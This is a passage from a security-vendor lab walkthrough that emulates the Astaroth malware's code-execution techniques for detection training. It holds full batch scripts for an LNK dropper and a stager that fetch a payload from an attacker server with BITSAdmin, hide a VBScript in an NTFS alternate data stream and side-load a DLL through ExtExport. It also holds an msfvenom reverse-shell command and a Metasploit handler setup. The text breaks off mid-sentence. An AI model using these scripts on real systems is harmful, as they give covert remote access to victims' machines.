{"id":10574,"date":"2020-07-03T09:00:00","date_gmt":"2020-07-03T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/"},"modified":"2026-05-25T10:34:07","modified_gmt":"2026-05-25T09:34:07","slug":"attack-detection-fundamentals-code-execution-and-persistence-lab-1","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/","title":{"rendered":"Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #1"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: Code Execution and Persistence &#8211; <span class=\"blue-text\">Lab #1<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Offensive security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Threat intelligence                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                03 Juli, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Teilen Sie dies                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20Code%20Execution%20and%20Persistence%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_f5e9a53dd2787b985d3a0973fa9b5af4\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Anartz Martin<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Inhaltliche Navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    W\u00e4hlen Sie einen Abschnitt                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20Code%20Execution%20and%20Persistence%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the second part of WithSecure Consulting&#x27;s Attack Detection Workshop series, covering Code Execution and Persistence, we explored a number of offensive techniques for achieving code execution and maintaining a foothold within a target environment.<\/p>\n<p>We emulated the TTPs used by Astaroth malware to do this, and saw how living-off-the-land binaries (LOLBins), DLL side-loading and alternate data streams could be put to use by threat actors. We also explored the detection strategies that can be employed to spot these using our own detection stacks. The following blog provides a step-by-step guide to recreating the demos from that Code Execution and Persistence workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown.<\/p>\n<p>For this first lab we are going to carry out a simplified simulation of a real Astaroth compromise, much like the ones we have detected. Although the flow of the Astaroth malware is a lot more sophisticated and stealthier than what it is proposed here, the core techniques will remain the same. Specifically, we are going to focus on the two new techniques the latest iteration of the malware incorporates, explaining how the actors behind the campaign used them to achieve their goals.<\/p>\n<p>In the same manner, we are also going to explain the different ways these techniques can be detected, providing examples of the different tools we can use to do it. The goal of this lab is therefore to provide the reader with a basic knowledge on how this attacks occur and how they can be detected.<\/p>\n<p>For better context, an introduction to this campaign and to each of these techniques is provided.<\/p>\n<p>DISCLAMER: Set up of the tools and the testing environment might not be covered comprehensively within this lab. We will assume basic familiarity with Linux\/Windows command line and the ability of the reader to deploy the necessary frameworks. For that, it is recommended to follow the suggested references for the official tutorials and walkthrough published by the framework&#x27;s author.<\/p>\n<h2>References<\/h2>\n<ul>\n<li><a href=\"https:\/\/www.microsoft.com\/security\/blog\/2020\/03\/23\/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable\/\" target=\"_blank\" rel=\"noopener\">Latest Astaroth living-off-the-land attacks are even more invisible but not less observable<\/a><\/li>\n<li><a href=\"https:\/\/lolbas-project.github.io\/\" target=\"_blank\" rel=\"noopener\">LOLBAS &#8211; Living Off The Land Binaries and Scripts (and now also Libraries)<\/a><\/li>\n<li><a href=\"https:\/\/lolbas-project.github.io\/lolbas\/Binaries\/Bitsadmin\/\" target=\"_blank\" rel=\"noopener\">LOLBAS &#8211; Bitsadmin.exe<\/a><\/li>\n<li><a href=\"https:\/\/www.hackingarticles.in\/windows-for-pentester-bitsadmin\/\" target=\"_blank\" rel=\"noopener\">Windows for Pentester: BITSAdmin<\/a><\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/bitsadmin\" target=\"_blank\" rel=\"noopener\">Microsoft Docs &#8211; bitsadmin<\/a><\/li>\n<li><a href=\"https:\/\/lolbas-project.github.io\/lolbas\/Binaries\/Extexport\/\" target=\"_blank\" rel=\"noopener\">LOLBAS &#8211; Extexport.exe<\/a><\/li>\n<li><a href=\"http:\/\/www.hexacorn.com\/blog\/2018\/04\/24\/extexport-yet-another-lolbin\/\" target=\"_blank\" rel=\"noopener\">ExtExport &#8211; yet another LOLBin<\/a><\/li>\n<li><a href=\"https:\/\/oddvar.moe\/2018\/01\/14\/putting-data-in-alternate-data-streams-and-how-to-execute-it\/\" target=\"_blank\" rel=\"noopener\">Putting data in Alternate data streams and how to execute it<\/a><\/li>\n<li><a href=\"https:\/\/gist.github.com\/api0cradle\/cdd2d0d0ec9abb686f0e89306e277b8f\" target=\"_blank\" rel=\"noopener\">Execute from Alternate Streams<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1096\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;amp;CK &#8211; NTFS File Attributes<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1073\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;amp;CK &#8211; DLL Side-Loading<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1218\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;amp;CK &#8211; Signed Binary Proxy Execution<\/a><\/li>\n<li><a href=\"https:\/\/www.offensive-security.com\/metasploit-unleashed\/\" target=\"_blank\" rel=\"noopener\">Offensive Security &#8211; Metasploit Unleashed<\/a><\/li>\n<\/ul>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Attacking VM &#8211; <a href=\"https:\/\/www.kali.org\/\" target=\"_blank\" rel=\"noopener\">Kali Linux<\/a><\/li>\n<li>Target VM (Windows with AV and Firewall disabled)<\/li>\n<li>SimpleHTTPServer (Python module)<\/li>\n<li><a href=\"https:\/\/www.metasploit.com\/\" target=\"_blank\" rel=\"noopener\">Metasploit<\/a><\/li>\n<\/ul>\n<h2>Astaroth Malware<\/h2>\n<p>Astaroth is a malware campaign that has always made heavy use of obfuscation, fileless techniques and legitimate system tools (also known as Living-off-the-Land binaries or LOLBins) in order to avoid detection. In its latest form, seen first in February and still active, the malware ditched the use of Windows Management Instrumentation Command-line (WMIC) and adopted two new, less common techniques:<\/p>\n<ul>\n<li>Abuse of Alternate Data Streams (ADS)<\/li>\n<li>Abuse of ExtExport.exe LOLBin.<\/li>\n<\/ul>\n<p>Through these techniques, the malware was able to get access to the victim&#x27;s system, deliver the payloads and execute them in an even stealthier manner than in previous campaigns.<\/p>\n<h2>Living-off-the-Land Binaries (LOLBins)<\/h2>\n<p>Living-off-the-Land Binaries or LOLBins is a term to refer to any binaries that are already part of the operating system and that can be abused by malicious actors to perform actions they were not intended to. They are very helpful for attackers for two main reasons:<\/p>\n<ul>\n<li>They can be used as they are, without the need to deliver any new files or modify them.<\/li>\n<li>They provide the perfect way to bypass detection mechanisms.<\/li>\n<\/ul>\n<p>This definition can also be expanded to include libraries and scripts, which are known as LOLBAS (Living-off-the-Land Binaries, Scripts and Libraries) further expandind the toolset readily available to the attacker.<\/p>\n<p>In the lab, as with the real Astaroth malware, we are going to focus on the next two LOLBins.<\/p>\n<h3>BITSAdmin<\/h3>\n<p>The Background Intelligent Transfer Service Admin (or BITSAdmin) is a Windows command-line tool whose main purpose is to manage download and upload jobs, while allowing us to monitor their progress. However, there are many different ways how this tool can and has historically been abused, with attackers using it for anything from file transfer to code execution. Some of these examples are detailed below:<\/p>\n<ul>\n<li>File Download<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">bitsadmin \/transfer &lt;job_name&gt; \/priority &lt;priority&gt; &lt;remote_path&gt; &lt;local_path&gt;<\/code><\/pre>\n<pre><code class=\"language-bash\">bitsadmin \/create 1 bitsadmin \/addfile 1 https:\/\/live.sysinternals.com\/autoruns.exe c:\\data\\playfolder\\autoruns.exe bitsadmin \/RESUME 1 bitsadmin \/complete 1<\/code><\/pre>\n<ul>\n<li>File Copy<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">bitsadmin \/create 1 &amp; bitsadmin \/addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe &amp; bitsadmin \/RESUME 1 &amp; bitsadmin \/Complete 1 &amp; bitsadmin \/reset<\/code><\/pre>\n<ul>\n<li>Code Execution<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">bitsadmin \/create 1 &amp; bitsadmin \/addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe &amp; bitsadmin \/SetNotifyCmdLine 1 c:\\data\\playfolder\\cmd.exe NULL &amp; bitsadmin \/RESUME 1 &amp; bitsadmin \/Reset<\/code><\/pre>\n<ul>\n<li>Persistence<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">bitsadmin \/Create &lt;job_name&gt;\nbitsadmin \/Addfile &lt;job_name&gt; &lt;remote_path&gt; &lt;local_path&gt;\nbitsadmin \/SetNotifyFlags &lt;job_name&gt; 1\nbitsadmin \/SetNotifyCmdLine &lt;job_name&gt; &lt;program_name&gt; [program_parameters]\nbitsadmin \/SetMinRetryDelay &lt;job_name&gt; 30\nbitsadmin \/Resume &lt;job_name&gt;<\/code><\/pre>\n<p>In this lab we are going to use BITSAdmin to transfer the payloads, but I strongly recommend the reader go over the list of references on this walkthrough and explore all its possible uses and tips on how to detect them.<\/p>\n<h3>ExtExport<\/h3>\n<p>ExtExport.exe is a utility that comes bundled with Internet Explorer that looks and loads DLLs with the following names:<\/p>\n<ul>\n<li>mozcrt19.dll<\/li>\n<li>mozsqlite3.dll<\/li>\n<li>sqlite3.dll<\/li>\n<\/ul>\n<p>An attacker can abuse this tool by passing it a path (&quot;C:\\test&quot; in the below example) where a malicious DLL is stored.<\/p>\n<pre><code class=\"language-bash\">Extexport.exe c:\\test foo bar<\/code><\/pre>\n<p>ExtExport.exe will then side-load it and the embedded payload will be executed.<\/p>\n<h2>Alternate Data Streams (ADS)<\/h2>\n<p>Alternative Data Streams (ADS) are a property of every entry on the Master File Table (MFT) of NTFS formatted file systems, that can be used to store arbitrary data. When used maliciously, this can be abused as a defense evasion and code execution technique, by hiding complete files from normal methods of detection, and providing the ability to access them at a later time.<\/p>\n<ul>\n<li>Hiding Files in ADS<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">type &lt;filepath&gt; &lt;target_file:ads&gt;<\/code><\/pre>\n<ul>\n<li>Executing Files Stored in ADS<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">&lt;command&gt; &lt;target_file:ads&gt; [arguments]<\/code><\/pre>\n<p>An important thing to note here is that the command to execute the file hidden in the ADS will be different depending on the format of said file.<\/p>\n<p>Unsurprisingly, this technique can also be abused as a means to achieve or help achieving persistence.<\/p>\n<h2>Walkthrough<\/h2>\n<h3>1 &#8211; Dropper Creation<\/h3>\n<p>First of all, we need to create a dropper file that will imitate the one users received after clicking on the malicious link in the Astaroth campaign, and that kickstarts the whole compromise process. To do this, we are going to write a helper batch file that will use a temporary VBScript to create the final LNK dropper file.<\/p>\n<p>Simply copy the code below to your favourite IDE, give it a .bat extension, move it to the Windows VM and execute it to create the dropper in LNK format.<\/p>\n<pre><code class=\"language-bash\">@echo off\n\nsetlocal enabledelayedexpansion\n\nrem Create a dropper in LNK (shortcut) format that will download and execute the CMD stager.\n\nset SERVER=http:\/\/&lt;attacking_ip&gt;\/\n\nset PATH_PUBLIC_DIR=C:\\Users\\Public\\Libraries\\raw\\\nrem Create the target directoty if it does not exist.\nif not exist &quot;%PATH_PUBLIC_DIR%&quot; mkdir %PATH_PUBLIC_DIR%\n\nset DROPPER_LNK=clickme.lnk\nset STAGER_CMD=stager.cmd\nset DROPPER_LNK_CREATE=dropper_lnk_create.vbs\n\nset URL_STAGER_CMD=%SERVER%%STAGER_CMD%\n\nset PATH_DROPPER_LNK_CREATE=%PATH_PUBLIC_DIR%%DROPPER_LNK_CREATE%\nset PATH_DROPPER_LNK=%PATH_PUBLIC_DIR%%DROPPER_LNK%\nset PATH_STAGER_CMD=%PATH_PUBLIC_DIR%%STAGER_CMD%\n\nrem Use a temporary VBScript to create the LNK dropper.\nrem The LNK dropper will contain code to download, execute and delete the CMD stager.\necho Set oWS = WScript.CreateObject(&quot;WScript.Shell&quot;) &gt; %PATH_DROPPER_LNK_CREATE%\necho sLinkFile = &quot;%PATH_DROPPER_LNK%&quot; &gt;&gt; %PATH_DROPPER_LNK_CREATE%\necho Set oLink = oWS.CreateShortcut(sLinkFile) &gt;&gt; %PATH_DROPPER_LNK_CREATE%\necho oLink.TargetPath = &quot;C:\\Windows\\System32\\cmd.exe&quot; &gt;&gt; %PATH_DROPPER_LNK_CREATE%\necho oLink.Arguments = &quot;\/c bitsadmin \/transfer 1 \/priority FOREGROUND %URL_STAGER_CMD% %PATH_STAGER_CMD% &amp; call %PATH_STAGER_CMD% &amp; del %PATH_STAGER_CMD%&quot; &gt;&gt; %PATH_DROPPER_LNK_CREATE%\necho oLink.Save &gt;&gt; %PATH_DROPPER_LNK_CREATE%\ncscript %PATH_DROPPER_LNK_CREATE%\ndel %PATH_DROPPER_LNK_CREATE%<\/code><\/pre>\n<p>Notably, within this script we can see the construction of our BITSAdmin command using the &quot;\/transfer&quot; flag.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/dropper-creation.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>When we execute the dropper, it will connect back to the attacking server, download the stager payload, execute it and delete it.<\/p>\n<p>NOTE: You can discard this batch file after the dropper has been created, as this is not really part of the simulation. Alternatively, you can use any other method you prefer to create the shortcut file.<\/p>\n<h3>2 &#8211; Stager Creation<\/h3>\n<p>Next we are going to write the stager. As mentioned in the introduction this is going to be a simplified simulation of the attack flow of the real threat, but we will still keep the main focus on the usage of LOLBins and Alternate Data Streams as a means of downloading, hiding and executing our payloads.<\/p>\n<p>The code that follows this text downloads the final Meterpreter payload in DLL format using Bitsadmin.<\/p>\n<pre><code class=\"language-bash\">bitsadmin \/transfer &lt;job_name&gt; \/priority FOREGROUND &lt;remote_filename&gt; &lt;local_filename&gt;<\/code><\/pre>\n<p>This payload then gets renamed to one of three DLL names that Extexport looks for (mozcrt19.dll, mozsqlite3.dll or sqlite3.dll) and stored in C:\\Users\\Public\\Libraries\\raw, where the Extexport utility will find it.<\/p>\n<p>For this to happen we need some launcher code first. This is going to be generated by a small VBScript that we will drop to disk, then copy into the ADS of desktop.ini and finally delete it, effectively hiding it from unwanted attention.<\/p>\n<pre><code class=\"language-bash\">type &lt;evil_file&gt; &lt;target_file:evil_file&gt; &amp;&amp; erase &lt;evil_file&gt;<\/code><\/pre>\n<p>Now that our newly-created launcher generator script is safely stored, we can execute it to get the launcher file in shortcut format (.lnk).<\/p>\n<pre><code class=\"language-bash\">cscript &lt;target_file:evil_file&gt;<\/code><\/pre>\n<p>This small program will use the Extexport LOLBin, which is a legitimate utility shipped as part of Internet Explorer. The code inside the launcher shortcut looks similar to this:<\/p>\n<pre><code class=\"language-bash\">C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe &lt;target_directory&gt; &lt;foo&gt; &lt;bar&gt;<\/code><\/pre>\n<p>Finally we can execute our launcher code:<\/p>\n<pre><code class=\"language-bash\">start \/b &lt;file&gt;<\/code><\/pre>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/stager-files.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/stager-dir.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>You can find the whole stager code below.<\/p>\n<pre><code class=\"language-bash\">@echo off\n\nsetlocal enabledelayedexpansion\n\nset SERVER=http:\/\/&lt;attacking_ip&gt;\/\n\nset PATH_PUBLIC_DIR=C:\\Users\\Public\\Libraries\\raw\\\nrem Create the target directoty if it does not exist.\nif not exist &quot;%PATH_PUBLIC_DIR%&quot; mkdir %PATH_PUBLIC_DIR%\n\nset PAYLOAD_DLL=payload.dll\nset TARGET_ADS=desktop.ini\nset LAUNCHER_LNK=launcher.lnk\nset LAUNCHER_CREATE_VBS=launcher_create.vbs\n\nset URL_PAYLOAD_DLL=%SERVER%%PAYLOAD_DLL%\n\nrem ExtExport.exe looks for any DLL with the following names.\nset EXTEXPORT_DLLS[1]=mozcrt19.dll\nset EXTEXPORT_DLLS[2]=mozsqlite3.dll\nset EXTEXPORT_DLLS[3]=sqlite3.dll\n\nrem Select one DLL filename at random.\nset \/a _rand=%RANDOM% %% 3 + 1\nset EXTEXPORT_DLL=!EXTEXPORT_DLLS[%_rand%]!\n\nset PATH_EXTEXPORT_DLL=%PATH_PUBLIC_DIR%%EXTEXPORT_DLL%\nset PATH_LAUNCHER_LNK=%PATH_PUBLIC_DIR%%LAUNCHER_LNK%\nset PATH_LAUNCHER_CREATE_VBS=%PATH_PUBLIC_DIR%%LAUNCHER_CREATE_VBS%\n\nset PATH_LAUNCHER_CREATE_ADS=%PATH_PUBLIC_DIR%%TARGET_ADS%:%LAUNCHER_CREATE_VBS%\n\nset PATH_EXTEXPORT_EXE=C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe\nset EXTEXPORT_ARGS=C:\\Users\\Public\\Libraries\\raw foo bar\n\nrem Download the renamed DLL payload from the server.\nbitsadmin \/transfer 2 \/priority FOREGROUND %URL_PAYLOAD_DLL% %PATH_EXTEXPORT_DLL%\n\nrem Use a temporary VBScript to create the LNK launcher.\nrem The launcher will take the renamed DLL payload and load it using ExtExport.\necho Set oWS = WScript.CreateObject(&quot;WScript.Shell&quot;) &gt; %PATH_LAUNCHER_CREATE_VBS%\necho sLinkFile = &quot;%PATH_LAUNCHER_LNK%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho Set oLink = oWS.CreateShortcut(sLinkFile) &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.TargetPath = &quot;%PATH_EXTEXPORT_EXE%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.Arguments = &quot;%EXTEXPORT_ARGS%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.Save &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\n\nrem Copy the launcher creation VBScript to the Alternate Data Stream (ADS) of desktop.ini and erase it.\ntype %PATH_LAUNCHER_CREATE_VBS% &gt; %PATH_LAUNCHER_CREATE_ADS% &amp;&amp; erase %PATH_LAUNCHER_CREATE_VBS%\n\nrem Execute the launcher creation VBScript from the Alternate Data Stream (ADS).\ncscript %PATH_LAUNCHER_CREATE_ADS%\n\nrem Execute the LNK launcher. This will use ExtExport.exe to side load and execute the DLL payload.\nstart \/b %PATH_LAUNCHER_LNK%<\/code><\/pre>\n<p>This file needs to be stored in your attacking VM in the same folder from where we are going to start our server. When we execute the dropper created in the previous step, this file will be fetched, executed and then deleted.<\/p>\n<p>NOTE: In the second lab we are going to modify this script to achieve persistence by adding this launcher in .lnk format to the StartUp folder.<\/p>\n<h3>3 &#8211; Payload Generation<\/h3>\n<p>In order to generate the malicious DLL file that Extexport will import, we will use msfvenom, a utility of the Metasploit framework used to generate payloads in different formats and for multiple platforms.<\/p>\n<p>To create the payload, enter the following command:<\/p>\n<pre><code class=\"language-bash\">msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=&lt;attacking_ip&gt; LPORT=4444 -f dll -o payload.dll<\/code><\/pre>\n<p>Breakdown of the command:<\/p>\n<ul>\n<li>-p windows\/meterpreter\/reverse_https &#8211; Tells msfvenom to generate a payload that will be suitable for the listener we previously created. This value needs to correspond to the one configured in the exploit\/multi\/handler within Metasploit.<\/li>\n<li>LHOST=&lt;OUR_IP&gt; &#8211; This will configure the IP address where the payload will connect back to.<\/li>\n<li>LPORT=4444 &#8211; This will set up the listening port.<\/li>\n<li>-f dll &#8211; This generates a payload in the DLL format.<\/li>\n<li>-o payload.dll &#8211; will write the payload into a file called payload.dll.<\/li>\n<\/ul>\n<p>If everything worked as expected, you should see something like this:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/msfvenom-dll-payload.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The name of the payload will be later renamed to one of the Extexport DLLs when we copy it to the target machine, as explained in the previous step.<\/p>\n<h3>4 &#8211; Server Setup<\/h3>\n<p>We are going to make use of the SimpleHTTPServer Python module to quickly spin up a HTTP server that will serve our newly-created stager and payload. In the Operation Cobalt Kitty lab in the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-3\/\" target=\"_blank\" rel=\"noopener\">first workshop<\/a>, we used Cobalt Strike&#x27;s web server to achieve this, here SimpleHTTPServer achieves the same thing.<\/p>\n<p>Change to the same directory where our payloads are stored and execute the following command:<\/p>\n<pre><code class=\"language-bash\"># python 2.X\npython -m SimpleHTTPServer 80\n\n# python 3.X\npython -m http.server 80<\/code><\/pre>\n<p>This will spin up our web server, and any file in that directory will be accessible by performing a request in the following format:<\/p>\n<pre><code class=\"language-bash\">http:\/\/&lt;server_ip&gt;\/&lt;requested_ file&gt;<\/code><\/pre>\n<h3>5 &#8211; Listener Setup<\/h3>\n<p>To set up the C2 server that will receive the reverse connection from our payload, we will use the Metasploit Framework. Installation and setup of the framework is outside of the scope of this lab and is therefore left as an exercise for the reader.<\/p>\n<p>Start the Metasploit console and configure what, in Metasploit terminology, is known as a &quot;handler&quot;:<\/p>\n<pre><code class=\"language-bash\">msfconsole\nuse exploit\/multi\/handler<\/code><\/pre>\n<p>This will bring you to the handler configuration. Here, we can specify the type of payload we wish to use, and allow us to configure the IP address and port where Metasploit will be 